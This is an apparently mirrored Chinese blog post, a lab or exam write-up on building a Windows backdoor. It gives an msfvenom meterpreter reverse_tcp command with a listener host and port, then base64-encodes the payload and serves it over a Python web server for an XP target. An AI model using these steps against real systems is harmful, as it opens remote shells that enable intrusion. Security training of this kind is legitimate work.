zoukankan      html  css  js  c++  java
  • 网络攻防考试第四题博客

    先在Kali Linux中生成32位Windows的后门shellcode:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=1234 -f raw -o win_backdoor.raw

    接着开启Metasploit进行监听反弹的shell


    然后通过以下命令,将shellcode进行base64编码并利用SimpleHTTPServer模块将/tmp目录作为Web服务根目录并建立Web服务器:
    base64 -i win_backdoor.raw > shellcode.bin
    python -m SimpleHTTPServer

    最后,到XP端运行一下代码即可:

    以上顺序最好不要搞乱,就按上面的顺序一般不会出错,但是如果顺序乱了就可能出许多问题了,因为送试了好多次,之前搞python黑帽子的时候就迷迷糊糊搞出来就完事了,考试的时候就有搞不出来了总是报错,经过一个小时的实验,错了好多次发现按照这个顺序不会出错,特别提醒以上所有用得到的IP全是靶机的IP地址,切记切记。
    结果:


  • 相关阅读:
    IDEA快捷键
    nginx之epoll模型的详细介绍
    Liunx权限修改命令
    小技巧3
    小技巧2
    小技巧1
    Ajax的简单使用
    dubbo
    快速创建虚拟机
    登录和注册功能的实现
  • 原文地址:https://www.cnblogs.com/wxhwsr/p/10881839.html
Copyright © 2011-2022 走看看